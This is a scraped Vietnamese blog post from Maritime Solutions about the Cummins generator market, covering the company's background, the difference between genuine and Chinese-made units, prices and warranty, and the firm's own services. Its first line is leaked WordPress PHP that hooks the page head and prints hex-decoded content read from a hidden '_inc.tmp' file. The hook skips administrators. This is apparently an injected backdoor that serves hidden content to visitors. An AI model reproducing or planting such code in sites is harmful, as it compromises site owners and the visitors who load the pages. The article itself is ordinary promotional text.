if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Bạn biết gì về thị trường máy phát điện Cummins? - Maritime Solutions

0768303666

.st0{fill:#FFFFFF;}

Tin tức

Bạn biết gì về thị trường máy phát điện Cummins?

 Tháng Năm 8, 2021

By  minhvu

Cummins không còn là cái tên xa lạ đối với người sử dụng các dòng máy phát điện. Vậy bạn biết gì về thị trường máy phát điện Cummins?

Giới Thiệu Về Tập Đoàn Cummins Inc.

Cummins Inc. là tập đoàn sản xuất động cơ Diezel và máy phát điện nổi tiếng thế giới. Hãng Cummins được thành lập vào năm 1919, có trụ sở chính đặt tại Columbus, bang Indiana – Hoa Kỳ. Tập đoàn Cummins có hơn 680 công ty con trực thuộc với tổng số nhân viên hơn 23.000 người. Mạng lưới phân phối và cơ sở bảo hành có trên 130 nước và vùng lãnh thổ. Doanh thu  hàng năm là 10 tỷ USD. Sản phẩm của hãng Cummins đã và đang được sử dụng tại các nước G7 và trên toàn thế giới.

Thương hiệu lâu đời của dòng máy Cummins
Thương hiệu lâu đời của dòng máy Cummins


Cummins Power Generation – một thành viên của tập đoàn Cummins là nhà thiết kế, sản xuất hàng đầu thế giới về máy phát điện và cũng là hãng duy nhất sản xuất đồng bộ toàn bộ máy phát điện. Tất cả các bộ phận chính của máy phát như động cơ, đầu phát, hệ thống điều khiển đều do các công ty con thực thuộc tập đoàn Cummins chế tạo.

Hãng Cummins có mạng lưới các nhà phân phối và cơ sở vật chất ở trên toàn thế giới nhờ đó việc bảo hành, bảo trì, cung cấp phụ tùng thay thế luôn được thực hiện với chất lượng tốt nhất và nhanh nhất. Đội ngũ kỹ sư, cán bộ kỹ thuật lành nghề được đào tạo chính quy sẵn sàng giải quyết , tư vấn cho khách hàng các giải pháp tốt nhất trong việc lựa chọn, sử dụng vận hành máy phát điện.

Tại Việt nam hiện đã có hơn 1500 khách hàng thân thiết sử dụng máy phát điện Cummins trong hầu hết các lĩnh vực như hàng không, khai thác mỏ, nhà máy , khu công nghiệp, ngân hàng, bênh viện, khách sạn, sân vận động, khu du lịch, viễn thông, phát thanh truyền hình …

Thị trường máy phát điện Cummins hiện nay

Hãng Cummins luôn đi tiên phong trong việc nghiên cứu, ứng dụng các công nghệ mới, tiên tiến nhất trong việc thiết kế, chế tạo máy phát điện nhằm đáp ứng những yêu cầu ngày càng cao và đa dạng của khách hàng về máy phát điện.

Các công trình sử dụng máy phát điện Cummins cũng được phân định khá rõ nét cho hai dòng sản phẩm chính hãng và nhập khẩu từ Trung Quốc.

Phân loại máy phát điện Cummins trên thị trường

Máy chính hãng phù hợp với những công trình đặc biệt và có nguồn ngân sách lớn. Các giàn khoan dầu đặt ngoài biển, đòi hỏi cường độ hoạt động cao, thậm chí thay cho điện lưới. Khai thác hầm mỏ (than, quặng) với môi trường hoạt động khắc nghiệt và hệ thống tải nặng. Khối Bệnh viện Trung ương, trung tâm dữ liệu, những nơi cần nguồn điện an toàn và có tính bảo mật cao… Tất nhiên còn nhiều những người đã dùng và yêu thích thương hiệu này.

Maritime Solutions cung cấp máy Cummins uy tín, chất lượng, giá cả cạnh tranh trên thị trường
Maritime Solutions cung cấp máy Cummins uy tín, chất lượng, giá cả cạnh tranh trên thị trường

Máy phát điện Cummins Trung Quốc được sử dụng nhiều cho các công trình như nhà máy công nghiệp, xưởng sản xuất tại các Khu công nghiệp. Các tòa nhà chung cư, khách sạn, resort có quy mô vừa và nhỏ. Máy chạy dự phòng cho điện lưới, hoạt động không quá 500 giờ/năm. 

Ưu thế vượt trội của Cummins Trung Quốc là giá rẻ chỉ bằng 50% so với Cummins chính hãng.

Chính sách bảo hành và bảo trì

Cả Cummins chính hãng và Cummins Trung Quốc đều được áp dụng chính sách bảo hành 24 tháng.

Cummins chính hãng trên thị trường có giá bán từ 4-5 triệu/1kVA tùy theo công suất máy. Và bảo trì hàng năm theo đúng quy định của nhà sản xuất, vật tư liêu hao chính hãng, mức khí khoảng (3% giá trị máy/năm).

>>Xem thêm: Cung cấp máy phát điện Cummins tại Hà Nội giá tốt nhất

Maritime Solutions – địa chỉ uy tín trên thị trường máy phát điện Cummins

Maritime Solutions là cái tên không quá xa lạ trên thị trường máy phát điện. Công ty chuyên cung cấp dịch vụ hàng hải sản xuất; nhập khẩu, phân phối máy phát điện uy tín, chất lượng.
Một số dhcj vụ của công ty bao gồm: sửa chữa tàu biểncung ứng thiết bị máy hàng hảidu lịch du thuyền;…

Hiện tại, Maritime Solutions phân phối nhiều thương hiệu nổi tiếng. Trong đó, máy phát điện Cummins luôn được khách hàng tin tưởng và lựa chọn. 

Khách hàng có nhu cầu tìm địa chỉ phân phối máy phát điện Cummins; hãy liên hệ trực tiếp với chúng tôi để được tư vấn!

minhvu


Your Signature

{"email":"Email address invalid","url":"Website address invalid","required":"Required field missing"}

Liên hệ với chúng tôi để được tư vấn Dịch vụ và giá cả tốt nhất 

>